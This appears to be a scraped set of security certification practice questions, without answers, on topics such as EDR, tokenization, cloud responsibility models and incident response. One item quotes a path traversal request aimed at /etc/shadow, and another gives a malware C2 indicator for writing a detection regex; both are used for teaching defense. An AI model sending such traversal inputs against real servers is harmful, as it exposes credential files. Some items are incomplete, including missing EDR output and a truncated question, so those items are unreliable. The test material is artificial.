An organization does not have visibility into when company-owned assets are off network or not connected via a VPN. The lack of visibility prevents the organization from meeting security and operational objectives. Which of the following cloud-hosted solutions should the organization implement to help mitigate the risk? A. Antivirus B. UEBA C. EDR D. HIDS.
A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks. Which of the following would BEST enable this activity? A. ISAC B. OSINT C. CVSS D. Threat modeling.
A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst reviewed the event logs and found the following:
• PAM had not been bypassed.
• DLP did not trigger any alerts.
• The antivirus was updated to the most current signatures.
Which of the following MOST likely occurred? A. Exploitation B. Exfiltration C. Privilege escalation D. Lateral movement.
A company processes sensitive cardholder information that is stored in an internal production database and accessed by internet-facing web servers. The company's Chief Information Security Officer (CISO) is concerned with the risks related to sensitive data exposure and wants to implement tokenization of sensitive information at the record level. The company implements a one-to-many mapping of primary credit card numbers to temporary credit card numbers.
Which of the following should the CISO consider in a tokenization system? A. Data field watermarking B. Field tagging C. Single-use translation D. Salted hashing.
A network administrator receives a ticket regarding an error from a remote worker who is trying to reboot a laptop. The laptop has not yet loaded the operating system, and the user is unable to continue the boot process. The administrator is able to provide the user with a recovery PIN, and the user is able to reboot the system and access the device as needed. Which of the following is the MOST likely cause of the error? A. Lockout of privileged access account B. Duration of the BitLocker lockout period C. Failure of the Kerberos time drift sync D. Failure of TPM authentication.
A security engineer is concerned about the threat of side-channel attacks. The company experienced a past attack that degraded parts of a SCADA system, causing a fluctuation to 20,000rpm from its normal operating range. As a result, the part deteriorated more quickly than the mean time to failure. A further investigation revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the rpm until the part failed. Which of the following solutions would be BEST to prevent a side-channel attack in the future? A. Installing online hardware sensors B. Air gapping important ICS and machines C. Implementing a HIDS D. Installing a SIEM agent on the endpoint.
Which of the following is the primary reason that a risk practitioner determines the security boundary prior to conducting a risk assessment? A. To determine the scope of the risk assessment B. To determine the business owner(s) of the system C. To decide between conducting a quantitative or qualitative analysis D. To determine which laws and regulations apply.
A security architect must mitigate the risks from what is suspected to be an exposed, private cryptographic key. Which of the following is the BEST step to take? A. Revoke the certificate. B. Inform all the users of the certificate. C. Contact the company's Chief Information Security Officer. D. Disable the website using the suspected certificate. E. Alert the root CA.
An employee's device was missing for 96 hours before being reported. The employee called the help desk to ask for another device. Which of the following phases of the incident response cycle needs improvement? A. Containment B. Preparation C. Resolution D. Investigation.
A security consultant has been asked to recommend a secure network design that would:
• Permit an existing OPC server to communicate with a new Modbus server that is controlling electrical relays.
• Limit operational disruptions.
Due to the limitations within the Modbus protocol, which of the following configurations should the security engineer recommend as part of the solution? A. Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 135. B. Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 102. C. Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 5000. D. Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 502.
A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred FIRST? A. Preserve secure storage. B. Clone the disk. C. Collect the most volatile data. D. Copy the relevant log files.
A company is designing a new system that must have high security. This new system has the following requirements:
• Permissions must be assigned based on role.
• Fraud from a single person must be prevented.
• A single entity must not have full access control.
Which of the following can the company use to meet these requirements? A. Dual responsibility B. Separation of duties C. Need to know D. Least privilege.
A Chief Security Officer (CSO) is concerned about the number of successful ransomware attacks that have hit the company. The data indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful. Which of the following should the CSO implement? A. Simulating a spam campaign B. Conducting a sanctioned vishing attack C. Performing a risk assessment D. Executing a penetration test.
A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement? A. Mirror the blobs at a local data center. B. Enable fast recovery on the storage account. C. Implement soft delete for blobs. D. Make the blob immutable.
To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within its proprietary software. Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL? A. Include stable, long-term releases of third-party libraries instead of using newer versions. B. Ensure the third-party library implements the TLS and disable weak ciphers. C. Compile third-party libraries into the main code statically instead of using dynamic loading. D. Implement an ongoing, third-party software and library review and regression testing.
After the latest risk assessment, the Chief Information Security Officer (CISO) decides to meet with the development and security teams to find a way to reduce the security task workload. The CISO would like to:
• Have a solution that uses API to communicate with other security tools.
• Use the latest technology possible.
• Have the highest controls possible on the solution.
Which of following is the BEST option to meet these requirements? A. EDR B. CSP C. SOAR D. CASB.
A new, online file hosting service is being offered. The service has the following security requirements:
• Threats to customer data integrity and availability should be remediated first.
• The environment should be dynamic to match increasing customer demands.
• The solution should not interfere with customers’ ability to access their data at anytime.
• Security analysts should focus on high-risk items.
Which of the following would BEST satisfy the requirements? A. Expanding the use of IPS and NGFW devices throughout the environment B. Increasing the number of analysts to identify risks that need remediation C. Implementing a SOAR solution to address known threats D. Integrating enterprise threat feeds in the existing SIEM.
Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? A. IaaS B. SaaS C. FaaS D. PaaS.
In comparison with traditional on-premises infrastructure configurations, defining ACLs in a CSP relies o A. cloud-native applications. B. containerization. C. serverless configurations. D. software-defined networking. E. secure access service edge.
A pharmaceutical company was recently compromised by ransomware. Given the following EDR output from the process investigation:On which of the following devices and processes did the ransomware originate? A. cpt-ws018, powershell.exe B. cpt-ws026, DearCry.exe C. cpt-ws002, NO-AV.exe D. cpt-ws026, NO-AV.exe E. cpt-ws002, DearCry.exe.
A company has instituted a new policy in which all outbound traffic must go over TCP ports 80 and 443 for all its managed mobile devices. No other IP traffic is allowed to be initiated from a device. Which of the following should the organization consider implementing to ensure internet access continues without interruption? A. CYOD B. MDM C. WPA3 D. DoH.
A cloud security architect has been tasked with selecting the appropriate solution given the following:
• The solution must allow the lowest RTO possible.
• The solution must have the least shared responsibility possible.
• Patching should be a responsibility of the CSP.
Which of the following solutions can BEST fulfil the requirements? A. PaaS B. IaaS C. Private D. SaaS.
A network administrator who manages a Linux web server notices the following traffic:
http://comptia.org/../../../../etc/shadow
Which of the following is the BEST action for the network administrator to take to defend against this type of web attack? A. Validate the server certificate and trust chain. B. Validate the server input and append the input to the base directory path. C. Validate that the server is not deployed with default account credentials. D. Validate that multifactor authentication is enabled on the server for all user accounts.
A mobile application developer is creating a global, highly scalable, secure chat application. The developer would like to ensure the application is not susceptible to on-path attacks while the user is traveling in potentially hostile regions. Which of the following would BEST achieve that goal? A. Utilize the SAN certificate to enable a single certificate for all regions. B. Deploy client certificates to all devices in the network. C. Configure certificate pinning inside the application. D. Enable HSTS on the application's server side for all communication.
A corporation discovered its internet connection is saturated with traffic originating from multiple IP addresses across the internet. A security analyst needs to find a solution to address future occurrences of this type of attack.
Which of the following would be the BEST solution to meet this goal? A. Implementing cloud-scrubbing services B. Upgrading the internet link C. Deploying a web application firewall D. Provisioning a reverse proxy.
A security engineer is working for a service provider and analyzing logs and reports from a new EDR solution, which is installed on a small group of workstations. Later that day, another security engineer receives an email from two developers reporting the software being used for development activities is now blocked. The developers have not made any changes to the software being used. Which of the following is the EDR reporting? A. True positive B. False negative C. False positive D. True negative.
An organization has just been breached, and the attacker is exfiltrating data from workstations. The security analyst validates this information with the firewall logs and must stop the activity immediately. Which of the following steps should the security analyst perform NEXT? A. Determine what data is being stolen and change the folder permissions to read only. B. Determine which users may have clicked on a malicious email link and suspend their accounts. C. Determine where the data is being transmitted and create a block rule. D. Determine if a user inadvertently installed malware from a USB drive and update antivirus definitions. E. Determine if users have been notified to save their work and turn off their workstations.
A security architect is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks? A. Code reviews B. Supply chain visibility C. Software audits D. Source code escrows.
A company has decided that only administrators are permitted to use PowerShell on their Windows computers. Which of the following is the BEST way for an administrator to implement this decision? A. Monitor the Application and Services Logs group within Windows Event Log. B. Uninstall PowerShell from all workstations. C. Configure user settings In Group Policy. D. Provide user education and training. E. Block PowerShell via HIDS.
A recent security audit identified multiple endpoints have the following vulnerabilities:
• Various unsecured open ports
• Active accounts for terminated personnel
• Endpoint protection software with legacy versions
• Overly permissive access rules
Which of the following would BEST mitigate these risks? (Choose three). A. Local drive encryption B. Secure boot C. Address space layout randomization D. Unneeded services disabled E. Patching F. Logging G. Removal of unused accounts H. Enabling BIOS password.
A client is adding scope to a project. Which of the following processes should be used when requesting updates or corrections to the client's systems? A. The implementation engineer requests direct approval from the systems engineer and the Chief Information Security Officer. B. The change control board must review and approve a submission. C. The information system security officer provides the systems engineer with the system updates. D. The security engineer asks the project manager to review the updates for the client's system.
A small company recently developed prototype technology for a military program. The company’s security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively? A. Join an information-sharing community that is relevant to the company. B. Leverage the MITRE ATT&CK framework to map the TTP. C. Use OSINT techniques to evaluate and analyze the threats. D. Implement a network-based intrusion detection system.
A company is looking at sending historical backups containing customer PII to a cloud service provider to save on storage costs. Which of the following is the MOST important consideration before making this decision? A. Availability B. Data sovereignty C. Geography D. Vendor lock-in.
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised? A. HSTS B. PKI C. CSRs D. OCSP.
ACSP, which wants to compete in the market, has been approaching companies in an attempt to gain business, The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following would be the MOST significant business risk to a company that signs a contract with this CSP? A. Resource exhaustion B. Geographic location C. Control plane breach D. Vendor lock-in.
A forensics investigator is analyzing an executable file extracted from storage media that was submitted for evidence. The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file. Which of the following should the investigator use while preserving evidence integrity? A. ldd B. bcrypt C. SHA-3 D. ssdeep E. dcfldd.
A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attacks. Which of the following Is the MOST important infrastructure security design element to prevent an outage? A. Supporting heterogeneous architecture B. Leveraging content delivery network across multiple regions C. Ensuring cloud autoscaling is in place D. Scaling horizontally to handle increases in traffic.
A security analyst is monitoring an organization's IDS and DLP systems for an alert indicating files were removed from the network. The files were from the workstation of an employee who was authenticated but not authorized to access the files. Which of the following should the organization do FIRST to address this issue? A. Provide additional security awareness training. B. Disable the employee's credentials until the issue is resolved. C. Ask human resources to notify the employee that sensitive files were accessed. D. Isolate the employee's network segment and investigate further.
In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees? A. Data scrubbing B. Field masking C. Encryption in transit D. Metadata.
A systems administrator was given the following IOC to detect the presence of a malicious piece of software communicating with its command-and-control server:
POST /malicious.php -
User-Agent: Malicious Tool V 1.0
Host: www.malicious.com -
The IOC documentation suggests the URL is the only part that could change. Which of the following regular expressions would allow the systems administrator to determine if any of the company hosts are compromised, while reducing false positives? A. User-Agent: Malicious Tool.* B. www\.malicious\.com\/malicious.php C. Post /malicious\.php D. Host: [a-z]*\.malicious\.com E. malicious.*.
A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead and be resistant to offline password attacks. Which of the following should the security consultant recommend? A. WPA2-Preshared Key B. WPA3-Enterprise C. WPA3-Personal D. WPA2-Enterprise.
A security consultant is designing an infrastructure security solution for a client company that has provided the following requirements:
• Access to critical web services at the edge must be redundant and highly available.
• Secure access services must be resilient to a proprietary zero-day vulnerability in a single component.
• Automated transition of secure access solutions must be able to be triggered by defined events or manually by security operations staff.
Which of the following solutions BEST meets these requirements? A. Implementation of multiple IPSec VPN solutions with diverse endpoint configurations enabling user optionality in the selection of a remote access provider. B. Remote access services deployed using vendor-diverse redundancy with event response driven by playbooks. C. Two separate secure access solutions orchestrated by SOAR with components provided by the same vendor for compatibility. D. Reverse TLS proxy configuration using OpenVPN/OpenSSL with scripted failover functionality that connects critical web services out to endpoint computers.
A software company decides to study and implement some new security features in the software it develops in C++ language. Developers are trying to find a way to avoid a malicious process that can access another process's execution area. Which of the following techniques can the developers do? A. Enable NX. B. Move to Java. C. Execute SAST. D. Implement memory encryption.
A security architect recommends replacing the company's monolithic software application with a containerized solution. Historically, secrets have been stored in the application's configuration files. Which of the following changes should the security architect make in the new system? A. Use a secrets management tool. B. Save secrets in key escrow. C. Store the secrets inside the Dockerfiles. D. Run all Dockerfiles in a randomized namespace.
Law enforcement officials informed an organization that an investigation has begun. Which of the following is the FIRST step the organization should take? A. Initiate a legal hold. B. Refer to the retention policy. C. Perform e-discovery. D. Review the subpoena.
A security analyst at a global financial firm was reviewing the design of a cloud-based system to identify opportunities to improve the security of the architecture. The system was recently involved in a data breach after a vulnerability was exploited within a virtual machine's operating system. The analyst observed the VPC in which the system was located was not peered with the security VPC that contained the centralized vulnerability scanner due to the cloud provider's limitations. Which of the following is the BEST course of action to help prevent this situation in the near future? A. Establish cross-account trusts to connect all VPCs via API for secure configuration scanning. B. Migrate the system to another larger, top-tier cloud provider and leverage the additional VPC peering flexibility. C. Implement a centralized network gateway to bridge network traffic between all VPCs. D. Enable VPC traffic mirroring for all VPCs and aggregate the data for threat detection.
A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable? A. Virtualized emulators B. Type 2 hypervisors C. Orchestration D. Containerization.
The Chief Information Security Officer (CISO) asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored. Which of the following would meet these requirements? A. Near-field communication B. Short Message Service C. Geofencing D. Bluetooth.
A startup software company recently updated its development strategy to incorporate the Software Development Life Cycle, including revamping the quality assurance and release processes for gold builds. Which of the following would most likely be developed FIRST as part of the overall strategy? A. Security requirements B. Code signing C. Application vetting D. Secure coding standards.
An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal? A. Properly configure a secure file transfer system to ensure file integrity. B. Have the external parties sign non-disclosure agreements before sending any images. C. Only share images with external parties that have worked with the firm previously. D. Utilize watermarks in the images that are specific to each external party.
A security analyst is reviewing SIEM events and is uncertain how to handle a particular event. The file is reviewed with the security vendor who is aware that this type of file routinely triggers this alert. Based on this information, the security analyst acknowledges this alert. Which of the following event classifications is MOST likely the reason for this action? A. True negative B. False negative C. False positive D. Non-automated response.
A security administrator wants to detect a potential forged sender claim in the envelope of an email. Which of the following should the security administrator implement? (Choose two.) A. MX record B. DMARC C. SPF D. DNSSEC E. S/MIME F. TLS.
A company is acquiring a competitor, and the security team is performing due diligence activities on the competitor prior to the acquisition. The team found a recent compliance audit of the competitor's environment that shows a mature security infrastructure, but it lacks a cohesive policy and process framework. Based on the audit findings, the security team determines the competitor's existing security capabilities are sufficient, but they will need to incorporate additional security policies. Which of the following risk management strategies is the security team recommending? A. Mitigate and avoid B. Transfer and accept
C. Avoid and transfer D. Accept and mitigate.
A security engineer performed an assessment on a recently deployed web application. The engineer was able to exfiltrate a company report by visiting the following URL:
www.intranet.abc.com/get-files.jsp?file=report.pdf
Which of the following mitigation techniques would be BEST for the security engineer to recommend? A. Input validation B. Firewall C. WAF D. DLP.
Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend? A. Adding more nodes to the web server clusters B. Changing the cipher algorithm used on the web server C. Implementing OCSP stapling on the server D. Upgrading to TLS 1.3.
|
